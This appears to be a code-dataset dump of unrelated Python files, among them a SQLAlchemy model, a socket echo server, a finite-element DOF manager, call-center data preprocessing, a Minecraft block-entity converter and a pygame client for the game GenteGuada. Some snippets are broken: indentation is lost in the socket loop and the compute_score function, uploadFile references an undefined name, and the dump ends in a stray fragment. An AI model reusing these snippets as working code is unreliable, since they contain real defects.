text stringlengths 38 1.54M |
|---|
from sqlalchemy import func
from application import db
class Favorite(db.Model):
    """Association row recording that one profile has favorited another.

    The pair (source_id, target_id) forms the composite primary key, and a
    CHECK constraint forbids a profile from favoriting itself.
    """

    __tablename__ = "Favorite"

    # Both endpoints are Profile rows: source favorites target.
    source_id = db.Column(db.Integer, db.ForeignKey("Profile.id"), nullable=False)
    target_id = db.Column(db.Integer, db.ForeignKey("Profile.id"), nullable=False)
    # Timestamp set both client-side (default) and by the DB (server_default).
    date_created = db.Column(db.DateTime, default=func.now(), server_default=func.now(), nullable=False)

    __table_args__ = (
        db.PrimaryKeyConstraint("source_id", "target_id"),
        db.CheckConstraint("source_id != target_id"),  # Can't favorite oneself.
    )

    def __init__(self, source_id, target_id):
        self.source_id = source_id
        self.target_id = target_id
|
#!/usr/bin/python
import socket
host = ''
port = 18000
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((host,port))
s.listen(2)
conn,addr = s.accept()
print 'Got connection from:',addr
while 1:
data = conn.recv(4096)
if not data:break
conn.sendall(data)
conn.close()
|
"""
Provides the data structure for the degrees of freedom manager.
"""
# IMPORTS
import numpy as np
from scipy import sparse
# DEBUGGING
from IPython import embed as IPS
class DOFManager(object):
    """
    Connects the finite element mesh and reference element
    through the assignment of degrees of freedom to individual elements.

    Parameters
    ----------
    mesh : pysofe.meshes.Mesh
        The mesh for which to provide connectivity information
    element : pysofe.elements.base.Element
        The reference element
    """

    def __init__(self, mesh, element):
        # consistency check: mesh and reference element must agree on
        # spatial dimension and on the number of vertices per cell
        if not mesh.dimension == element.dimension:
            msg = "Dimension mismatch between mesh and reference element! ({}/{})"
            raise ValueError(msg.format(mesh.dimension, element.dimension))
        elif not mesh.ref_map._shape_elem.n_verts == element.n_verts:
            msg = "Incompatible shapes between mesh and reference element!"
            raise ValueError(msg)
        self._mesh = mesh
        self._element = element

    @property
    def mesh(self):
        # The mesh this manager was built for.
        return self._mesh

    @property
    def element(self):
        # The reference element this manager was built for.
        return self._element

    @property
    def n_dof(self):
        """
        The total number of degrees of freedom
        """
        # Dof indices are 1-based (0 is the "unused" sentinel), so the
        # maximum over the cell dof map is the total count.
        # NOTE(review): np.abs suggests dof indices may be stored signed
        # (e.g. to encode orientation) -- confirm against the mesh module.
        n_dof = np.abs(self.get_dof_map(d=self._mesh.dimension)).max()
        return n_dof

    def get_dof_map(self, d, mask=None):
        """
        Returns the degrees of freedom mapping that connects the global mesh
        entities of topological dimension `d` to the local reference element.

        Parameters
        ----------
        d : int
            The topological dimension of the entities for which to return
            the degrees of freedom mapping
        mask : array_like
            An 1d array marking certain entities of which to get the dof map
        """
        dof_map = self._compute_connectivity_array()[d]
        if mask is not None:
            mask = np.asarray(mask)
            assert mask.ndim == 1
            # boolean masks select columns, integer masks index columns
            if mask.dtype == bool:
                dof_map = dof_map.compress(mask, axis=1)
            elif mask.dtype == int:
                dof_map = dof_map.take(mask, axis=1)
            else:
                raise TypeError("Invalid type of mask! ({})".format(mask.dtype))
        return dof_map

    def extract_dofs(self, d, mask=None):
        """
        Returns a boolean array specifying the degrees of freedom
        associated with the mesh entities of topological dimension `d`.

        Parameters
        ----------
        d : int
            The topological dimension of the mesh entities
        mask : array_like
            An 1d array marking certain entities of which to get the dofs
        """
        # first we need the dof map
        dof_map = self.get_dof_map(d, mask)
        n_dof = self.n_dof
        # remove duplicates and dofs mapped to `0` (the unused sentinel)
        dofs = np.unique(dof_map)
        dofs = np.setdiff1d(dofs, 0)
        # build array using coo sparse matrix capabilities:
        # scatter True at each (0, dof-1) position of a 1 x n_dof matrix
        col_ind = dofs - 1
        row_ind = np.zeros_like(col_ind)
        data = np.ones_like(col_ind, dtype=bool)
        dofs = sparse.coo_matrix((data, (row_ind, col_ind)), shape=(1, n_dof))
        # turn it into an 1d array
        dofs = dofs.toarray().ravel()
        return dofs

    def _compute_connectivity_array(self):
        """
        Establishes the connection between the local and global degrees of freedom
        via the connectivity array `C` where `C[i,j] = k` connects the `i`-th
        global basis function on the `j`-th element to the `k`-th local basis
        function on the reference element.
        """
        # the assignement of the degrees of freedom from 1 to the total number
        # of dofs will be done according to the following order:
        # 1.) components (scalar- or vector-valued)
        # 2.) entities
        # 3.) topological dimension (vertices, edges, cells)

        # first the assignment of new dofs
        #----------------------------------
        global_dim = self.mesh.dimension
        # init n_dofs and a list that will hold the dof indices
        # that will be assigned to the entities of each topological
        # dimension
        n_dofs = 0
        dofs = [None] * (global_dim + 1)
        # iterate through all topological dimensions and generate
        # the needed dof indices
        for topo_dim in xrange(global_dim + 1):
            # first we need the number of entities of the current
            # topological dimension
            n_entities = self.mesh.topology.n_entities[topo_dim]
            # the entry in the dof tuple specifies how many dofs are
            # associated with one entity of the current topological dimension
            dofs_needed = self.element.dof_tuple[topo_dim] * n_entities
            # generate the new dof indices starting with the current
            # number of dofs generated (dof numbering is 1-based)
            new_dofs = n_dofs + 1 + np.arange(dofs_needed, dtype=int)
            # reshape them such that the dofs that correspond to one
            # entity are contained in the corresponding column
            dofs[topo_dim] = new_dofs.reshape((-1, n_entities))
            # raise the number of generated dofs
            n_dofs += dofs_needed
        # the dof index arrays listed in `dofs` now contain column-wise
        # the dof indices for each entity of the corresponding topological
        # dimension

        # assemble dof maps
        #-------------------
        # init list that will hold the connectivity arrays
        # for each topological dimension
        dof_map = [None] * (global_dim + 1)
        # iterate through the topological dimensions
        # and assemble the dof map for the associated entities
        for entity_dim in xrange(global_dim + 1):
            # init a template for the dof map of the
            # currently considered entities
            temp = [None] * (entity_dim + 1)
            # iterate over all sub-entities (using their dimension)
            # of the currently considered entities and
            # add the corresponding dof indices from the
            # dof index array to the template
            for sub_dim in xrange(entity_dim + 1):
                # first we need to get the incidence relation
                # `entity_dim -> sub_dim`
                if sub_dim < entity_dim:
                    incidence = self.mesh.topology.get_connectivity(d=entity_dim,
                                                                    dd=sub_dim,
                                                                    return_indices=True)
                    n_entities = incidence.shape[0]
                else:
                    # an entity is trivially incident to itself;
                    # build the identity incidence (1-based, one per entity)
                    assert sub_dim == entity_dim
                    n_entities = self.mesh.topology.n_entities[entity_dim]
                    incidence = 1 + np.arange(n_entities, dtype=int)[:,None]
                # now we take the corresponding dof indices
                # and add them to the template
                # (incidence is 1-based, hence the `- 1` when indexing)
                sub_dim_dofs = dofs[sub_dim].take(incidence.T - 1, axis=1)
                temp[sub_dim] = np.reshape(sub_dim_dofs, newshape=(-1, n_entities))
            # stack the per-sub-dimension dofs into one array, column-wise
            # per entity of dimension `entity_dim`
            dof_map[entity_dim] = np.vstack(temp)
        return dof_map
|
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 29 09:57:02 2016
@author: juliette

Preprocessing script: loads the call-center training data, cleans it,
builds the test frame from the submission file, and computes per-slot
mean received calls used as a baseline prediction.
"""
from IPython.display import display
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from utils_preprocessing import date_format, date_to_str, fill_holidays, date_to_str_2
from challenge_constants import *
from datetime import datetime as dt
import datetime
import pickle
# %% load the raw training data (semicolon-separated CSV)
df = pd.read_csv("data/train_2011_2012_2013.csv", sep=';')
#df.to_pickle("data/train.pkl")
#df = pd.read_pickle("data/train.pkl")
# %% nan handling: encode the comment column as a 0/1 flag
df['ASS_COMENT'] = df['ASS_COMENT'].fillna(0)
df['ASS_COMENT'] = df['ASS_COMENT'].replace('Rattachement au Pôle Grand Compte', 1)
# %% dates: normalize to string then parse to datetime
df = date_to_str(df, ['DATE'])
df = date_format(df, ['DATE'])
# %% holidays: add holiday indicator columns
df = fill_holidays(df)
# %% categorical columns: convert low-cardinality columns to `category` dtype
l = ['TPER_TEAM', 'SPLIT_COD', 'ASS_ASSIGNMENT', 'ASS_DIRECTORSHIP', 'ASS_PARTNER', 'ASS_POLE', 'ASS_SOC_MERE',
'DAY_WE_DS']
for col in l:
    df[col] = df[col].astype('category')
# %% useless columns: drop columns not used downstream
columns_to_drop = ["ACD_COD", "ACD_LIB", "CSPL_INCOMPLETE"]
df = df.drop(columns_to_drop, axis=1)
# %% test data: parse the tab-separated submission file (skip header line)
lines = open("data/submission.txt", "r", encoding="utf-8").readlines()
dates = []
assignments = []
d = dict.fromkeys(['DATE', 'DATE_FORMAT', 'ASS_ASSIGNMENT'])
for line in lines[1:]:
    row = line.split("\t")
    dates.append(row[0])
    assignments.append(row[1])
# DATE keeps the original string; DATE_FORMAT gets parsed to datetime below
d['DATE'] = dates
d['DATE_FORMAT'] = dates
d['ASS_ASSIGNMENT'] = assignments
df_test = pd.DataFrame(data=d)
df_test = date_to_str(df_test, ['DATE_FORMAT'])
df_test = date_format(df_test, ['DATE_FORMAT'])
# %% Keeping only necessary columns for this analysis
# NOTE(review): df_small is a view slice; the assignments below may raise
# SettingWithCopyWarning -- consider .copy() if warnings matter.
df_small = df[['ASS_ASSIGNMENT','TPER_HOUR','DAY_WE_DS','CSPL_RECEIVED_CALLS', 'DATE']]
# TIME_SLOT is "<hour><minute>" concatenated as strings (e.g. "930" for 9:30)
df_small['TIME_SLOT'] = df_small['DATE'].apply(lambda date: str(date.hour)+str(date.minute))
df_small['YEAR'] = df_small['DATE'].apply(lambda date: date.year)
# %% date formatting: derive French weekday name, hour and time slot for the test set
dayOfWeek = ['Lundi',
'Mardi',
'Mercredi',
'Jeudi',
'Vendredi',
'Samedi',
'Dimanche']
df_test['DAY_WE_DS'] = df_test['DATE_FORMAT'].apply(lambda date: dayOfWeek[date.weekday()])
df_test['TPER_HOUR'] = df_test['DATE_FORMAT'].apply(lambda date: date.hour)
df_test['TIME_SLOT'] = df_test['DATE_FORMAT'].apply(lambda date: str(date.hour)+str(date.minute))
print(df_test['DAY_WE_DS'])
print(df_test['TPER_HOUR'])
print(df_test['TIME_SLOT'])
# %% Means grouped by department, hour and day of the week
# ~3 years of data, each weekday occurs about 365*3/7 times; the /2 presumably
# accounts for half-hour slots -- TODO confirm this divisor.
NUMBER_DAYS = 3*365/(2*7)
means_df = pd.DataFrame({"mean":df_small.groupby(['ASS_ASSIGNMENT', 'DAY_WE_DS', 'TIME_SLOT'])
['CSPL_RECEIVED_CALLS'].sum()}).reset_index()
means_df['mean'] = means_df['mean'] / NUMBER_DAYS
# %% join the per-slot means onto the test rows
df_merge= pd.merge(df_test, means_df,on=['ASS_ASSIGNMENT','TIME_SLOT', 'DAY_WE_DS'], how='inner')
def compute_score(y_true, y_predict, alpha=0.1):
return np.average(np.exp(alpha * (y_true - y_predict)) - alpha * (y_true - y_predict) - np.ones(len(y_predict)))
# %% build the baseline prediction and write the submission file
#df_merge['prediction'] = df_merge['mean'].apply(lambda x: int(np.ceil(2 * float(x))))
# Baseline: predict the historical per-slot mean directly.
df_merge['prediction'] = df_merge['mean']
d_sub = df_merge[['DATE', 'ASS_ASSIGNMENT', 'prediction']]
d_sub.to_csv('data/test_submission.csv', sep="\t", encoding='utf-8', index=False)
# %% quick sanity check on the merged frame
print(df_merge.max())
# -*- coding: utf-8 -*-
import MySQLdb
# Ordered list of profile fields; save_star_info emits values in this order,
# so it must match the target table's column order.
star_info_list = [
'name',
'english_name',
'profession',
'zodiac',
'gender',
'height',
'weight',
'blood_group',
'birthday',
'birthplace',
'relationship',
'biography',
]
class Star(object):
    """Holds one celebrity's profile attributes and mirrors them into the
    ``info`` dict (keyed by column name) used for database insertion."""

    def __init__(self):
        self.info = {}              # column name -> value, filled by update_info()
        self.name = None
        self.english_name = None
        self.profession = None
        self.zodiac = None
        self.gender = 'male'        # default when the source page gives no gender
        self.height = None
        self.weight = None
        self.blood_group = None
        self.birthday = None
        self.birthplace = None
        self.biography = None
        self.relationship = None

    def update_info(self):
        """Copy every attribute into ``self.info`` under its column name.

        Bug fix: 'birthplace' previously copied ``self.birthday``.
        """
        self.info.update({'name': self.name})
        self.info.update({'english_name': self.english_name})
        self.info.update({'profession': self.profession})
        self.info.update({'zodiac': self.zodiac})
        self.info.update({'gender': self.gender})
        self.info.update({'height': self.height})
        self.info.update({'weight': self.weight})
        self.info.update({'blood_group': self.blood_group})
        self.info.update({'birthday': self.birthday})
        self.info.update({'birthplace': self.birthplace})
        self.info.update({'biography': self.biography})
        self.info.update({'relationship': self.relationship})

    def save_star_info(self, connection_wrapper):
        """Serialize ``self.info`` in ``star_info_list`` order and insert it.

        None becomes the SQL literal 'null'; strings are escaped and quoted.
        connection_wrapper: object exposing ``insert_row(values)``.
        """
        info_list = []
        for key in star_info_list:
            item = self.info[key]
            if item is None:
                item = 'null'
            elif isinstance(item, unicode):
                item = '"{}"'.format(MySQLdb.escape_string(item.encode('utf8')))
            elif isinstance(item, str):
                item = '"{}"'.format(MySQLdb.escape_string(item))
            info_list.append(item)
        connection_wrapper.insert_row(info_list)
|
import json
import directories
from WorldConverter.itemMapping.convert import convertItem
# Mapping tables: platform-specific block-entity id -> intermediate id,
# and intermediate id -> id for each target platform ('PC' = Java, 'PE' = Bedrock).
blockEntityToIntermediate = json.load(open(directories.getFiltersDir()+'/WorldConverter/tileEntityMapping/_intermediate.json'))
blockEntityFromIntermediate = {}
blockEntityFromIntermediate['PC'] = json.load(open(directories.getFiltersDir()+'/WorldConverter/tileEntityMapping/intermediate_java.json'))
blockEntityFromIntermediate['PE'] = json.load(open(directories.getFiltersDir()+'/WorldConverter/tileEntityMapping/intermediate_bedrock.json'))
from pymclevel import TAG_List, TAG_Byte, TAG_Int, TAG_Compound, TAG_Short, TAG_Double, TAG_String, TAG_Float
def convertBlockEntity(convertFrom, convertTo, te):
    """Convert a block entity's NBT compound `te` in place between platforms.

    convertFrom/convertTo: 'PC' (Java) or 'PE' (Bedrock).
    Raises if the entity id is unknown to the mapping tables.
    """
    if convertFrom == convertTo:
        return
    if 'id' not in te:
        # Fix: the original did `del te` (which only unbinds the local name)
        # and then crashed dereferencing te['id'] on the next line.
        return
    if te['id'].value not in blockEntityToIntermediate:
        raise Exception('{} is not a known block entity name'.format(te['id'].value))
    intermediateID = blockEntityToIntermediate[te['id'].value]
    # conversion code here
    # something recursive would probably be required in the long term
    if intermediateID == 'minecraft:flower_pot':
        # Java stores the potted item as Item/Data (string id + int data);
        # Bedrock stores it as item/mData (numeric id + int data).
        if convertFrom == 'PC':
            if 'Item' in te:
                itemID = te['Item'].value
                del te['Item']
            else:
                itemID = 'minecraft:air'
                # raise Exception('Item definition not in te:{}'.format(te))
            if 'Data' in te:
                itemData = te['Data'].value
                del te['Data']
            else:
                itemData = 0
        elif convertFrom == 'PE':
            if 'item' in te:
                itemID = te['item'].value
                del te['item']
            else:
                itemID = 0
                # raise Exception('Item definition not in te:{}'.format(te))
            if 'mData' in te:
                itemData = te['mData'].value
                del te['mData']
            else:
                itemData = 0
        itemIDNew, itemDataNew = convertItem(convertFrom, convertTo, itemID, itemData)
        if convertTo == 'PC':
            te['Item'] = TAG_String(itemIDNew)
            # Fix: the original assigned te['Item'] twice, clobbering the
            # item id with the data value; the data belongs in te['Data'].
            te['Data'] = TAG_Int(itemDataNew)
        elif convertTo == 'PE':
            te['item'] = TAG_Short(itemIDNew)
            te['mData'] = TAG_Int(itemDataNew)
    elif intermediateID == 'minecraft:bed':
        # Bed colour: same key on both platforms, but Java uses Int and
        # Bedrock uses Byte; 14 (red) is the default when missing.
        if convertFrom in ['PC', 'PE']:
            if 'color' in te:
                colour = te['color'].value
                del te['color']
            else:
                colour = 14
        if convertTo == 'PC':
            te['color'] = TAG_Int(colour)
        elif convertTo == 'PE':
            te['color'] = TAG_Byte(colour)
    # elif intermediateID == 'minecraft:chest':
    # if PC
    # change things unique to a chest
    # change inventory
    # convertInventory(convertFrom, convertTo, te)
    if intermediateID not in blockEntityFromIntermediate[convertTo]:
        raise Exception('{} is not a known block entity name'.format(te['id'].value))
    if blockEntityFromIntermediate[convertTo][intermediateID] is None:
        # NOTE(review): `del te` only removes the local binding; the caller's
        # compound is untouched. Signalling "drop this entity" likely needs a
        # return value or caller-side handling -- confirm intended contract.
        del te
    else:
        te['id'] = TAG_String(blockEntityFromIntermediate[convertTo][intermediateID])
# def convertInventory(convertFrom, convertTo, te):
# if PC
# copy tag to the correct location and convert item using the item mappings
# convertItem(...)
# if PE |
def CI(P, R, T):
    """Compound principal P at R percent per year for T years and print the result.

    NOTE(review): the printed value is the final accumulated amount, not the
    interest component alone -- confirm that is the intended output.
    """
    for _ in range(T):
        interest = (P * R) / 100   # one year's interest on the current balance
        P = P + interest
    print("CI = ", P)
print("Here is a program to find out the COMPOUND INTEREST :-\n")
P = float(input("Enter the Starting amount : ₹"))
R = float(input("Enter Rate : "))
T = int(input("Enter time in Year : "))
CI(P, R, T)
|
import sys

# Greedy stock-trading simulation: read a count line then daily prices from
# stdin, buy at local minima, sell at local maxima, and print the final cash.
data = []
money = 100          # starting cash
shares = 0
for line in sys.stdin:
    data.append(int(line))
prices = data[1:]    # first stdin line is a count, not a price
# turningpoints[i] tracks the index of the last buy/sell decision point,
# so prices[turningpoints[i-1]] is the price at the previous turning point.
turningpoints = [0]
if len(prices) == 1:
    # Nothing to trade on a single price point.
    money = 100
else:
    # Buy up front only if the price is about to rise.
    if prices[0] < prices[1]:
        shares = int(money/prices[0])
        money -= shares*prices[0]
    for i in range(1,len(prices)-1):
        if prices[turningpoints[i-1]] < prices[i] and prices[i] > prices[i+1]:
            # Local maximum: sell everything.
            money += prices[i]*shares
            shares = 0
            turningpoints.append(i)
        elif prices[turningpoints[i-1]] > prices[i] and prices[i] < prices[i+1]:
            # Local minimum: buy as much as possible (capped at 100000 shares).
            shares = int(money/prices[i])
            if shares > 100000:
                shares = 100000
            money -= shares*prices[i]
            turningpoints.append(i)
        else:
            # No trade: carry the previous turning point forward.
            turningpoints.append(turningpoints[-1])
    # Liquidate any remaining position at the final price.
    money += shares*prices[-1]
print(int(money))
|
# chapter 3
# Definition of radius
r = 0.43

# Import the math package
import math
from math import radians

# Circumference two ways: the classic 2*pi*r, and via radians(360) == 2*pi.
C = 2 * math.pi * r
Crad = radians(360) * r

# Area two ways: pi*r**2, and via radians(180) == pi.
A = math.pi * r ** 2
Arad = radians(180) * r ** 2

# Report the results.
print("Circumference: " + str(C))
print("Circumference using radians: " + str(Crad))
print("Area: " + str(A))
print("Area using radians: " + str(Arad))
|
# -*- coding: utf-8 -*-
import sys
import datetime
import os
import pygame
import pygame.locals
import time
import dMVC.remoteclient
import ocempgui.widgets
import GG.isoview.login
import GG.utils
import GG.isoview.guiobjects
#Constants
VERSION = "0.17.1-3"
VERSION_TITLE = "GenteGuada "+VERSION
# Cached files older than this many weeks are purged on startup.
CLEAR_CACHE_WEEKS = 4
# Splash/loading screen artwork and label placement (pixel coordinates).
LOADING_BACKGROUND = os.path.join(GG.utils.INIT_IMAGE_PATH, "loadingGG.png")
LOADING_BACKGROUND_POSITION = [0, 0]
LOADING_LABEL = "Cargando..."
LOADING_LABEL_POSITION = [350, 300]
WAITING_LABEL_POSITION = [314, 335]
# Placeholder image shown while an avatar photo mask uploads.
UPLOAD_MASK = os.path.join(GG.utils.PATH_PHOTO_MASK,"imgUpload.png")
# User-facing (Spanish) message for a failed server connection.
ERROR_CONNECTION = "No hay conexion con el servidor"
FPS = 30
ICON = os.path.join(GG.utils.INIT_IMAGE_PATH, "icon64.png")
class GenteGuada:
""" GenteGuada class.
This is the program's main class. It starts all services and runs the game.
"""
def __init__(self):
""" Class constructor.
"""
self.__screen = None
self.__system = None
self.__isoHud = None
self.__session = None
self.__client = None
self.__fullScreen = None
self.__avatarDownloadImages = []
self.__exitCondition = None
self.__singleMode = False
self.__clearCache()
self.avatarConfigurationData = None
GenteGuada.instance = self
@staticmethod
def getInstance():
""" Returns this class's instance.
"""
return GenteGuada.instance
def getSession(self):
""" Returns the active session object.
"""
return self.__session
def __input(self, events):
""" Handles the keyboard and window input events.
"""
for event in events:
if event.type == pygame.locals.QUIT:
self.finish()
if event.type == pygame.locals.KEYDOWN:
if event.key == pygame.locals.K_ESCAPE:
self.finish()
def finish(self):
""" Closes the program and all its services.
"""
if self.__session:
self.__session.getPlayer().setState(GG.utils.STATE[1])
if self.__exitCondition is None:
sys.exit(0)
self.__isoHud.getModel().unsubscribeEvents()
self.__isoHud.getIVRoom().getModel().exitPlayer(self.__isoHud.getPlayer())
self.__isoHud.unsubscribeAllEvents()
pygame.mixer.music.stop()
self.__exitCondition = True
def __connectScreen(self):
""" Loads the "loading screen".
"""
widgetContainer = ocempgui.widgets.Renderer()
widgetContainer.set_screen(self.__screen)
window = ocempgui.widgets.Box(GG.utils.SCREEN_SZ[0], GG.utils.SCREEN_SZ[1])
imgPath = LOADING_BACKGROUND
imgBackgroundRight = GG.isoview.guiobjects.OcempImageMapTransparent(imgPath)
imgBackgroundRight.topleft = LOADING_BACKGROUND_POSITION
window.add_child(imgBackgroundRight)
loadingLabel = GG.isoview.guiobjects.OcempLabel("Conectando ...", GG.isoview.guiobjects.STYLES["labelWaiting"])
loadingLabel.topleft = WAITING_LABEL_POSITION
window.add_child(loadingLabel)
widgetContainer.add_widget(window)
def __loadingScreen(self):
""" Loads the "loading screen".
"""
widgetContainer = ocempgui.widgets.Renderer()
widgetContainer.set_screen(self.__screen)
window = ocempgui.widgets.Box(GG.utils.SCREEN_SZ[0], GG.utils.SCREEN_SZ[1])
imgPath = LOADING_BACKGROUND
imgBackgroundRight = GG.isoview.guiobjects.OcempImageMapTransparent(imgPath)
imgBackgroundRight.topleft = LOADING_BACKGROUND_POSITION
window.add_child(imgBackgroundRight)
loadingLabel = GG.isoview.guiobjects.OcempLabel(LOADING_LABEL, GG.isoview.guiobjects.STYLES["labelLoading"])
loadingLabel.topleft = LOADING_LABEL_POSITION
window.add_child(loadingLabel)
widgetContainer.add_widget(window)
def __waitScreen(self):
""" Loads the "waiting screen".
"""
widgetContainer = ocempgui.widgets.Renderer()
widgetContainer.set_screen(self.__screen)
window = ocempgui.widgets.Box(GG.utils.SCREEN_SZ[0], GG.utils.SCREEN_SZ[1])
imgPath = self.getDataPath(LOADING_BACKGROUND)
imgBackgroundRight = GG.isoview.guiobjects.OcempImageMapTransparent(imgPath)
imgBackgroundRight.topleft = LOADING_BACKGROUND_POSITION
window.add_child(imgBackgroundRight)
loadingLabel = GG.isoview.guiobjects.OcempLabel("Salas ocupadas. Espere...", GG.isoview.guiobjects.STYLES["labelWaiting"])
loadingLabel.topleft = WAITING_LABEL_POSITION
window.add_child(loadingLabel)
widgetContainer.add_widget(window)
def start(self, params):
""" Creates all necessary objects and initializes attributes.
params: application start parameters.
"""
pygame.init()
pygame.display.set_caption(VERSION_TITLE)
icon = pygame.image.load(ICON)
pygame.display.set_icon(icon)
self.__screen = pygame.display.set_mode(GG.utils.SCREEN_SZ, pygame.HWSURFACE | pygame.DOUBLEBUF, 0)
if params.fullscreen:
pygame.display.toggle_fullscreen()
self.__fullScreen = params.fullscreen
self.__connectScreen()
self.__setSystem(params.ip, params.port)
if self.__system is None:
errorConnection = GG.isoview.login.ErrorConnection(self.__screen, self)
errorConnection.draw()
self.__loadingScreen()
winLogin = GG.isoview.login.Login(self.__screen, self)
self.__session = winLogin.draw()
#self.__session = winLogin.draw(params.user, params.password)
self.__loadingScreen()
user = self.__session.getPlayer()
#userAdmin = False
if user.admin:
# userAdmin = winLogin.drawAccessMode()
# user.setAccessMode(userAdmin)
user.setAccessMode(True)
self.__loadingScreen()
#self.__initGame(user, userAdmin)
self.__initGame(user)
def getSystem(self):
""" Returns the system object.
"""
return self.__system
def __setSystem(self, ipAddress, port):
""" Loads a new system object from a remote location.
ipAddress: remote location ip address.
port: remote location port.
"""
if ipAddress:
try:
self.__client = dMVC.remoteclient.RClient(ipAddress, port = port, autoEvents=False)
except Exception, excep:
print excep, ERROR_CONNECTION
if self.__client is not None:
self.__system = self.__client.getRootModel()
if not self.validateVersion(self.__client.getVersion()):
import GG.isoview.login
errorVersion = GG.isoview.login.ErrorVersion(self.__screen, self)
errorVersion.draw()
else:
import GG.model.ggsystem
self.__singleMode = True
self.__system = GG.model.ggsystem.GGSystem()
def validateVersion(self, version):
if version in [VERSION,"0.17.1-1"]:
return True
return False
#def __initGame(self, user, accesMode):
def __initGame(self, user):
""" Initializes all start parameters and runs the game's main process.
"""
#self.__isoHud = self.__session.defaultView(self.__screen, self.__fullScreen, user, accesMode)
self.__isoHud = self.__session.defaultView(self.__screen, self.__fullScreen, user)
self.__screen.fill([0, 0, 0])
self.__isoHud.draw()
isohud = self.__isoHud
intentedFPS = 30
frameCounter = 0
theClock = pygame.time.Clock()
theClock_tick = theClock.tick
get_ticks = pygame.time.get_ticks
pygame_event_get = pygame.event.get
time_sleep = time.sleep
if self.__client:
client_processEvents = self.__client.processEvents
else:
client_processEvents = lambda : None # Do nothing!
last = get_ticks()
self.__exitCondition = False
while not self.__exitCondition:
time_sleep(0.01) # Minor sleep to give opportunity to another thread to execute
theClock_tick(FPS)
client_processEvents()
now = get_ticks()
self.checkUploadFileMaskFinish()
isohud.updateFrame(pygame_event_get(), now)
self.__exitCondition = None
pygame.quit()
def getDataPath(self, img):
""" Returns the data path for an item image, being local or remote.
"""
if self.__singleMode:
return os.path.join(GG.utils.DATA_PATH, img)
else:
pathFile = os.path.join(GG.utils.LOCAL_DATA_PATH, img)
if not os.path.isfile(pathFile):
imgData = self.__system.getResource(img)
if imgData:
if not os.path.isdir(os.path.dirname(pathFile)):
GG.utils.createRecursiveDir(os.path.dirname(pathFile))
imgFile = open(pathFile, "wb")
imgFile.write(imgData)
imgFile.close()
else:
return GG.utils.IMG_ERROR
return pathFile
def getListDataPath(self, imgList):
""" Returns the data path for an item image list.
imgList: image list.
"""
result = []
for imgName in imgList:
result.append(self.getDataPath(imgName))
return result
def __clearCache(self):
""" Clears the local cache folder.
"""
now = datetime.datetime.today()
limitDate = now - datetime.timedelta(weeks=CLEAR_CACHE_WEEKS)
limitTime = time.mktime(limitDate.timetuple())
GG.utils.clearCache(GG.utils.LOCAL_DATA_PATH, limitTime)
def uploadFile(self, upFile, dirDest=None):
""" Uploads a new file and copies it.
upFile: uploaded file.
dirDest: file copy location.
"""
if not os.path.isfile(upFile):
return None
filepath, fileName = os.path.split(upFile)
name, ext = os.path.splitext(fileName)
try:
uploadedFile = open(file , "rb")
dataFile = uploadedFile.read()
uploadedFile.close()
except:
return None
return self.__system.uploadFile([name, ext], dataFile, dirDest)
def asyncUploadFile(self, upFile, finishMethod, dirDest = None):
""" Uploads a new file on asynchronous mode and copies it.
upFile: uploaded file.
finishMethod: method executed on upload end.
dirDest: file copy location.
"""
if not os.path.isfile(upFile):
finishMethod(None)
return
filepath, fileName = os.path.split(upFile)
name, ext = os.path.splitext(fileName)
try:
uploadedFile = open(upFile , "rb")
dataFile = uploadedFile.read()
uploadedFile.close()
except:
finishMethod(None)
return
self.__system.async(self.__system.uploadFile, finishMethod, [name, ext], dataFile, dirDest)
def checkUploadFileMaskFinish(self):
if self.avatarConfigurationData:
if self.avatarConfigurationData["mask"]:
self.__system.changeAvatarConfiguration(self.avatarConfigurationData["configuracion"], self.avatarConfigurationData["player"], self.avatarConfigurationData["mask"])
self.avatarConfigurationData = None
def uploadAvatarConfiguration(self, configuration, player):
""" Uploads an avatar configuration.
configuration: avatar configuration data.
player: avatar's owner.
"""
if configuration["mask"]:
self.avatarConfigurationData = {}
self.avatarConfigurationData["configuracion"] = configuration
self.avatarConfigurationData["player"] = player
self.avatarConfigurationData["mask"] = None
self.asyncUploadFile(UPLOAD_MASK, self.uploadMaskFileFinish)
else:
self.__system.changeAvatarConfiguration(configuration, player, None)
def uploadMaskFileFinish(self, resultado):
""" Changes the avatar's mask after upload is finished.
resultado: upload result.
"""
if resultado:
self.avatarConfigurationData["mask"] = resultado
def getRoom(self, label):
""" Returns an specific room.
label: room's label.
"""
return self.__system.getRoom(label)
def createRoom(self, label, size, image, maxUsers, enabled, startRoom, copyRoom=None):
""" Creates a new room.
label: room label.
size: room size.
image: sprite used to paint the room floor.
maxUsers: max users per room.
enabled: enabled room flag.
starterRoom: sets this room as starter or not.
copyRoom: room to be copied.
"""
return self.__system.createRoom(image, label, size, maxUsers, enabled, startRoom, copyRoom)
def deleteRoom(self, label):
""" Deletes a room from the system.
label: room's label.
"""
return self.__system.deleteRoom(label)
def getAvatarImages(self, avatar):
""" Creates avatar images.
avatar: curren player's avatar.
"""
if not avatar.username in self.__avatarDownloadImages:
self.__avatarDownloadImages.append(avatar.username)
self.__system.async(self.__system.getAvatarImages, self.getAvatarImagesFinish, avatar)
def getAvatarImagesFinish(self, resultado):
""" Saves all created avatar images.
resultado: avatar images creation result.
"""
path = resultado["path"]
if not os.path.isdir(os.path.join(GG.utils.LOCAL_DATA_PATH, path)):
GG.utils.createRecursiveDir(os.path.join(GG.utils.LOCAL_DATA_PATH, path))
for key in resultado.keys():
if not key in ["path", "avatar", "timestamp"]:
avatarImage = open(os.path.join(GG.utils.LOCAL_DATA_PATH, path, key), "wb")
avatarImage.write(resultado[key])
avatarImage.close()
self.__isoHud.changeAvatarImages(resultado["avatar"], resultado["path"], resultado["timestamp"])
if resultado["avatar"].username in self.__avatarDownloadImages:
self.__avatarDownloadImages.remove(resultado["avatar"].username)
def isSingleMode(self):
""" Checks wether the game is in sigle player mode or multiplayer mode.
"""
return self.__singleMode
def isAvatarDownload(self, avatar):
return avatar.username in self.__avatarDownloadImages
def sendError(self):
if os.path.isfile("error.txt"):
fileError = open("error.txt","r")
errorData = fileError.read()
fileError.close()
send = self.__system.sendError(errorData)
if send:
os.remove("error.txt")
|
def convert_to_scream(text):
    """Return `text` as a scream: upper-cased with a trailing exclamation mark."""
    screamed = text.upper()
    return screamed + '!'
# Interactive driver: read a (Dutch) prompt, scream it back.
message = input('Wat wil je schreeuwen?: ')
loud_message = convert_to_scream(message)
print(loud_message)
|
# 5
# X S X X T
